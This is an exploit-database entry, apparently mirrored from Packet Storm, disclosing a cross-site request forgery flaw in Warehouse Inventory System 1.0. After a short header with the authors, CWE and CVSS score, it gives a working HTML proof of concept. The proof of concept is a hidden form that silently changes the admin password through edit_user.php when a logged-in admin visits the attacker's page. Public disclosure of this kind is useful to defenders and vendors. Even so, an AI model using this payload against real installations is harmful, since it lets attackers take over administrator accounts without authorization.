Share
## https://sploitus.com/exploit?id=PACKETSTORM:158815
# Exploit Title: Warehouse Inventory System - Cross-Site Request Forgery (CSRF) - Change Admin Password  
# Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)  
# Date: August 9th, 2020  
# Vendor Homepage: https://oswapp.com  
# Software Link: https://github.com/siamon123/warehouse-inventory-system/archive/master.zip  
# Version: 1.0  
# Tested On: Windows 10 Pro + XAMPP | Python 2.7  
# CWE-352: Cross-Site Request Forgery (CSRF)  
# CVSS Base Score: 7.5 # Impact Subscore: 5.9 # Exploitability Subscore: 1.6  
# Vulnerability Description:  
# Cross-Site Request Forgery (CSRF) vulnerability in 'edit_user.php' webpage of OSWAPP's   
# Warehouuse Inventory System v1.0 allows remote attackers to change the admins password  
# via authenticated admin visiting a third-party site.  
  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://<IP_ADDRESS>/edit_user.php?id=1" method="POST">  
<input type="hidden" name="password" value="Boku123!" />  
<input type="hidden" name="update-pass" value="" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>